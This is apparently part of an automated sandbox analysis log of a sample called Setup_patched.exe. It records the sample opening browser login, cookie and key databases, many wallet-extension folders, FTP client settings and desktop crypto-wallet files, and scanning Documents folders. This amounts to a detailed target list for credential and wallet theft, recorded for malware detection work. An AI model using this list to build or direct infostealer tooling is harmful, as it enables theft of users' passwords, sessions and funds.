            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
